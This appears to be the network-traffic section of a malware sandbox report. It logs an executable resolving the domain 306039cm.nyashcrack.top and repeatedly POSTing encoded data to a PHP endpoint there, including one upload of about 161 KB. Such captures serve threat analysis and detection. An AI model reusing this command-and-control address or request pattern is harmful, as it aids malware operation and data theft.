                                                                                              Dec 9, 2024 16:02:17.047188044 CET4997780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:17.166712999 CET804997737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:17.966264963 CET804997737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:18.078701019 CET4997780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:18.201807976 CET804997737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:18.327599049 CET4997780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:18.327601910 CET4998280192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:18.446980000 CET804998237.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:18.447117090 CET4998280192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:18.447242022 CET4998280192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:18.448169947 CET804997737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:18.448275089 CET4997780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:18.566665888 CET804998237.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:18.797169924 CET4998280192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:18.916510105 CET804998237.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:19.564395905 CET4998580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:19.564726114 CET4998280192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:19.683794975 CET804998537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:19.683870077 CET4998580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:19.683983088 CET4998580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:19.684307098 CET804998237.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:19.684365034 CET4998280192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:19.689480066 CET4998680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:19.803535938 CET804998537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:19.810269117 CET804998637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:19.810384035 CET4998680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:19.810553074 CET4998680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:19.930073977 CET804998637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:20.032031059 CET4998580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:20.151608944 CET804998537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:20.151628971 CET804998537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:20.159682035 CET4998680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:20.279105902 CET804998637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:20.967525959 CET804998537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:21.062758923 CET4998580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:21.082212925 CET804998637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:21.185417891 CET804998537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:21.250255108 CET4998680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:21.250312090 CET4998580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:21.321890116 CET804998637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:21.451090097 CET4998580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:21.451143026 CET4998680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:21.454487085 CET4999180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:21.571096897 CET804998537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:21.571198940 CET4998580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:21.572098017 CET804998637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:21.572154045 CET4998680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:21.574414015 CET804999137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:21.574491024 CET4999180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:21.574626923 CET4999180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:21.694057941 CET804999137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:21.924679041 CET4999180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:22.044385910 CET804999137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:22.844572067 CET804999137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:23.062746048 CET4999180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:23.077614069 CET804999137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:23.225923061 CET4999180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:23.250727892 CET4999780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:23.346431971 CET804999137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:23.346515894 CET4999180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:23.370650053 CET804999737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:23.370737076 CET4999780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:23.370908976 CET4999780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:23.490261078 CET804999737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:23.719099998 CET4999780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:23.838589907 CET804999737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:24.641576052 CET804999737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:24.820651054 CET4999780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:24.874121904 CET804999737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:24.937741995 CET4999780192.168.2.437.44.238.250
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 9, 2024 16:00:30.972146988 CET | 54012 | 53 | 192.168.2.4 | 1.1.1.1
Dec 9, 2024 16:00:31.302555084 CET | 53 | 54012 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 9, 2024 16:00:30.972146988 CET | 192.168.2.4 | 1.1.1.1 | 0x817e | Standard query (0) | 306039cm.nyashcrack.top | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 9, 2024 16:00:31.302555084 CET | 1.1.1.1 | 192.168.2.4 | 0x817e | No error (0) | 306039cm.nyashcrack.top | | 37.44.238.250 | A (IP address) | IN (0x0001) | false
• 306039cm.nyashcrack.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 37.44.238.250 | 80 | 8932 | C:\Users\user\Desktop\4si9noTBNw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 16:00:31.523606062 CET | 341 | OUT | POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: 306039cm.nyashcrack.top
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive
Dec 9, 2024 16:00:31.876008034 CET | 344 | OUT | Data Raw: 00 0a 04 02 06 00 01 01 05 06 02 01 02 07 01 00 00 06 05 0b 02 0c 03 0a 00 52 0d 57 06 01 06 03 0d 02 04 0a 02 0d 03 02 0e 00 07 51 05 53 02 05 06 06 0c 01 0e 01 01 00 01 05 07 01 05 0b 00 0a 00 51 0e 0d 07 00 04 04 0e 52 0e 57 0a 0d 0d 04 06 0d
Data Ascii: RWQSQRWV\L~^[ZwLP\a\hhRiMtpkcxDoUgl`zKmhNwIk\~_~V@AxCbLry
Dec 9, 2024 16:00:32.795283079 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 9, 2024 16:00:32.875606060 CET | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Dec 2024 15:00:31 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1364
Connection: keep-alive
Dec 9, 2024 16:00:32.875722885 CET | 285 | IN | Data Raw: 5d 68 61 09 42 50 7b 65 57 57 65 0c 5e 6a 05 0b 01 5a 58 6a 4f 5c 60 76 46 6b 72 66 58 7f 51 7f 6f 65 4a 7b 40 71 58 56 5c 57 05 7a 43 57 63 5c 43 54 5f 00 5e 54 00 6f 40 52 71 78 04 63 5b 73 45 6f 64 7e 00 7b 58 6f 46 57 6b 67 5f 69 75 74 63 5c
Data Ascii: ]haBP{eWWe^jZXjO\`vFkrfXQoeJ{@qXV\WzCWc\CT_^To@Rqxc[sEod~{XoFWkg_iutc\rsi`{UPh_cbU[UU\lkxBpYSUVvCWoWFWY[ZYbZ[[e}Sa[p\W\qXNQkfCZAkUFnxDWZaCPToL]v^RabQ|PQyz}Xja@P|gVSo_RswRkeo~gZy_xX}vx]idOS|fVU`SRqDc\Pbb_qX
Dec 9, 2024 16:00:32.915924072 CET | 317 | OUT | POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: 306039cm.nyashcrack.top
Content-Length: 384
Expect: 100-continue
Dec 9, 2024 16:00:33.265873909 CET | 384 | OUT | Data Raw: 59 5f 5e 50 5a 43 59 5c 5c 5c 56 57 50 5b 5b 51 5f 5a 59 5a 56 58 51 57 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
Data Ascii: Y_^PZCY\\\VWP[[Q_ZYZVXQWXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P B,-"!#%/2:4U<40]>27>Q<:'< ?:&^#,X +
Dec 9, 2024 16:00:33.329189062 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 9, 2024 16:00:33.766499996 CET | 308 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Dec 2024 15:00:32 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
Data Raw: 0f 15 24 53 35 26 23 1d 36 38 3c 56 3a 03 3d 5a 22 3f 20 07 3f 2d 37 19 26 55 34 04 2c 2f 2d 0d 35 33 2a 5f 29 21 20 55 2b 0f 3f 0e 21 25 21 5a 06 1e 26 03 26 2e 20 1e 2e 21 3f 00 3f 32 2e 5c 23 10 2c 03 24 0d 23 0c 25 01 30 15 25 3f 3b 1b 2f 30 32 1e 29 07 23 44 3f 3c 33 10 27 15 2b 53 0e 1f 23 01 3e 21 32 0b 3f 3d 34 0d 20 3f 05 0a 31 58 36 51 27 31 3b 0d 28 14 3e 0e 3f 33 23 56 37 03 2c 51 26 02 29 5e 3f 06 2b 52 25 23 20 5e 22 0f 2f 52 00 31 5c 4d
Data Ascii: $S5&#68<V:=Z"? ?-7&U4,/-53*_)! U+?!%!Z&&. .!??2.\#,$#%0%?;/02)#D?<3'+S#>!2?=4 ?1X6Q'1;(>?3#V7,Q&)^?+R%# ^"/R1\M
Dec 9, 2024 16:00:33.869049072 CET | 318 | OUT | POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: 306039cm.nyashcrack.top
Content-Length: 1748
Expect: 100-continue
Dec 9, 2024 16:00:34.219031096 CET | 1748 | OUT | Data Raw: 5c 5e 5b 56 5f 40 59 5f 5c 5c 56 57 50 5b 5b 5f 5f 5f 59 5d 56 5e 51 56 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
Data Ascii: \^[V_@Y_\\VWP[[___Y]V^QVXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P /!6Z5*4729/($'(**%.#Y=+ D?<<&^#,X +
Dec 9, 2024 16:00:34.274930954 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 9, 2024 16:00:34.727336884 CET | 308 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Dec 2024 15:00:33 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
Data Raw: 0f 15 27 0c 21 36 30 01 21 06 30 54 2c 2d 2d 5a 36 02 30 05 3f 3e 2c 06 31 33 05 5a 2c 2c 3a 51 20 30 2e 5a 3f 32 2b 0e 3e 22 28 1f 21 1f 21 5a 06 1e 26 00 30 13 3f 0d 3a 1c 24 1f 2b 31 22 5a 20 2e 01 5d 24 1d 28 54 25 01 20 1a 25 2f 0d 56 2f 0d 2a 57 2a 07 3c 18 3c 01 2b 58 27 05 2b 53 0e 1f 20 1f 3e 22 35 54 28 03 19 54 21 01 0e 10 25 10 3a 50 32 31 2c 16 28 2a 1c 0e 3f 23 1a 0d 20 13 37 0f 32 3c 3a 03 3c 01 0a 08 32 23 20 5e 22 0f 2f 52 00 31 5c 4d
Data Ascii: '!60!0T,--Z60?>,13Z,,:Q 0.Z?2+>"(!!Z&0?:$+1"Z .]$(T% %/V/*W*<<+X'+S >"5T(T!%:P21,(*?# 72<:<2# ^"/R1\M


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.44973737.44.238.250808932C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:00:33.342895031 CET318OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1040
                                                                                              Expect: 100-continue
Dec 9, 2024 16:00:33.688447952 CET | 1040 | OUT | Data Raw: (opaque request body; hex dump omitted)
Dec 9, 2024 16:00:34.624191046 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 9, 2024 16:00:34.858685970 CET | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 09 Dec 2024 15:00:33 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 3d 5d 5d 5a
    Data Ascii: =]]Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49738 | 37.44.238.250 | 80 | 8932 | C:\Users\user\Desktop\4si9noTBNw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 16:00:35.512751102 CET | 318 | OUT | POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Host: 306039cm.nyashcrack.top
    Content-Length: 1040
    Expect: 100-continue
Dec 9, 2024 16:00:35.872297049 CET | 1040 | OUT | Data Raw: (opaque request body; hex dump omitted)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49741 | 37.44.238.250 | 80 | 8932 | C:\Users\user\Desktop\4si9noTBNw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 16:00:36.498913050 CET | 344 | OUT | POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Host: 306039cm.nyashcrack.top
    Content-Length: 161268
    Expect: 100-continue
    Connection: Keep-Alive
Dec 9, 2024 16:00:36.844135046 CET to 16:00:37.251404047 CET | OUT | Data Raw: ten request-body chunks (12360, 7416, 7416, 7416, 2472, 8652, 1236, 2472, 28428 and 7416 bytes); opaque hex dumps omitted
Dec 9, 2024 16:00:37.770098925 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 9, 2024 16:00:38.803881884 CET | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 09 Dec 2024 15:00:37 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 3d 5d 5d 5a
    Data Ascii: =]]Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49742 | 37.44.238.250 | 80 | 8932 | C:\Users\user\Desktop\4si9noTBNw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 16:00:36.664628029 CET | 342 | OUT | POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Host: 306039cm.nyashcrack.top
    Content-Length: 1040
    Expect: 100-continue
    Connection: Keep-Alive
Dec 9, 2024 16:00:37.015894890 CET | 1040 | OUT | Data Raw: (opaque request body; hex dump omitted)
Dec 9, 2024 16:00:37.934995890 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 9, 2024 16:00:38.174645901 CET | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 09 Dec 2024 15:00:37 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 3d 5d 5d 5a
    Data Ascii: =]]Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49744 | 37.44.238.250 | 80 | 8932 | C:\Users\user\Desktop\4si9noTBNw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 16:00:38.434356928 CET | 318 | OUT | POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Host: 306039cm.nyashcrack.top
    Content-Length: 1040
    Expect: 100-continue
Dec 9, 2024 16:00:38.781555891 CET | 1040 | OUT | Data Raw: (opaque request body; hex dump omitted)
Dec 9, 2024 16:00:39.738765955 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 9, 2024 16:00:39.970696926 CET | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 09 Dec 2024 15:00:38 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 3d 5d 5d 5a
    Data Ascii: =]]Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49745 | 37.44.238.250 | 80 | 8932 | C:\Users\user\Desktop\4si9noTBNw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 16:00:39.906934023 CET | 318 | OUT | POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Host: 306039cm.nyashcrack.top
    Content-Length: 1732
    Expect: 100-continue
Dec 9, 2024 16:00:40.266098022 CET | 1732 | OUT | Data Raw: (opaque request body; hex dump omitted)
Dec 9, 2024 16:00:41.185609102 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 9, 2024 16:00:41.418291092 CET | 308 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 09 Dec 2024 15:00:40 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 152
    Connection: keep-alive
    Data Raw: (opaque binary response body; hex dump omitted)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49746 | 37.44.238.250 | 80 | 8932 | C:\Users\user\Desktop\4si9noTBNw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 16:00:40.221318960 CET | 318 | OUT | POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Host: 306039cm.nyashcrack.top
    Content-Length: 1024
    Expect: 100-continue
Dec 9, 2024 16:00:40.579246044 CET | 1024 | OUT | Data Raw: (opaque request body; hex dump omitted)
Dec 9, 2024 16:00:41.492619991 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 9, 2024 16:00:41.726821899 CET | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 09 Dec 2024 15:00:40 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 3d 5d 5d 5a
    Data Ascii: =]]Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49748 | 37.44.238.250 | 80 | 8932 | C:\Users\user\Desktop\4si9noTBNw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 16:00:41.997818947 CET | 318 | OUT | POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Host: 306039cm.nyashcrack.top
    Content-Length: 1040
    Expect: 100-continue
Dec 9, 2024 16:00:42.344016075 CET | 1040 | OUT | Data Raw: (opaque request body; hex dump omitted)
Dec 9, 2024 16:00:43.293565035 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 9, 2024 16:00:43.526642084 CET | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 09 Dec 2024 15:00:42 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 3d 5d 5d 5a
    Data Ascii: =]]Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49751 | 37.44.238.250 | 80 | 8932 | C:\Users\user\Desktop\4si9noTBNw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 16:00:43.783799887 CET | 342 | OUT | POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Host: 306039cm.nyashcrack.top
    Content-Length: 1040
    Expect: 100-continue
    Connection: Keep-Alive
Dec 9, 2024 16:00:44.141036987 CET | 1040 | OUT | Data Raw: (opaque request body; hex dump omitted)
                                                                                              Dec 9, 2024 16:00:45.063651085 CET25INHTTP/1.1 100 Continue
                                                                                              Dec 9, 2024 16:00:45.298460960 CET158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Mon, 09 Dec 2024 15:00:44 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 4
                                                                                              Connection: keep-alive
                                                                                              Data Raw: 3d 5d 5d 5a
                                                                                              Data Ascii: =]]Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49752 | 37.44.238.250 | 80 | 8932 | C:\Users\user\Desktop\4si9noTBNw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 16:00:45.543610096 CET | 342 | OUT | POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Host: 306039cm.nyashcrack.top
    Content-Length: 1040
    Expect: 100-continue
    Connection: Keep-Alive
Dec 9, 2024 16:00:45.890894890 CET | 1040 | OUT | Data Raw: 59 5d 5b 56 5f 40 59 5e 5c 5c 56 57 50 58 5b 59 5f 5d 59 58 56 5c 51 5b 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
    Data Ascii: Y][V_@Y^\\VWPX[Y_]YXV\Q[XR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P A;:6]78190V? &8*& +)$B>=,<&^#,X '


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49753 | 37.44.238.250 | 80 | 8932 | C:\Users\user\Desktop\4si9noTBNw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 16:00:46.543173075 CET | 342 | OUT | POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Host: 306039cm.nyashcrack.top
    Content-Length: 1756
    Expect: 100-continue
    Connection: Keep-Alive
Dec 9, 2024 16:00:46.891196966 CET | 1756 | OUT | Data Raw: 59 58 5e 52 5f 4a 5c 5c 5c 5c 56 57 50 51 5b 50 5f 58 59 5b 56 5f 51 5a 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
    Data Ascii: YX^R_J\\\\VWPQ[P_XY[V_QZXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P D,"" :7&: ?'+&(")&.S4>U(D>.8?&^#,X
Dec 9, 2024 16:00:47.819869041 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 9, 2024 16:00:48.054800987 CET | 308 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 09 Dec 2024 15:00:46 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 152
    Connection: keep-alive
    Data Raw: 0f 15 24 55 36 26 09 13 20 38 06 57 2e 2d 26 03 22 05 20 05 28 3d 2c 03 31 23 27 16 2d 2f 39 0f 36 0d 0b 06 2b 0f 09 0a 3e 21 37 0e 23 35 21 5a 06 1e 25 11 33 2d 38 1e 3a 54 20 58 3f 08 32 5c 37 10 33 5d 33 0a 28 1c 31 01 2c 59 30 01 28 09 2f 1d 32 52 3e 3d 23 07 28 06 38 01 27 2f 2b 53 0e 1f 23 02 3d 1f 13 10 2b 5b 24 0f 21 3f 2f 0f 31 3e 29 0d 31 0c 2b 0d 2b 2a 3e 0f 28 20 3b 54 37 2e 28 14 32 2c 04 06 3c 3f 37 19 24 23 20 5e 22 0f 2f 52 00 31 5c 4d
    Data Ascii: $U6& 8W.-&" (=,1#'-/96+>!7#5!Z%3-8:T X?2\73]3(1,Y0(/2R>=#(8'/+S#=+[$!?/1>)1++*>( ;T7.(2,<?7$# ^"/R1\M


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49759 | 37.44.238.250 | 80 | 8932 | C:\Users\user\Desktop\4si9noTBNw.exe
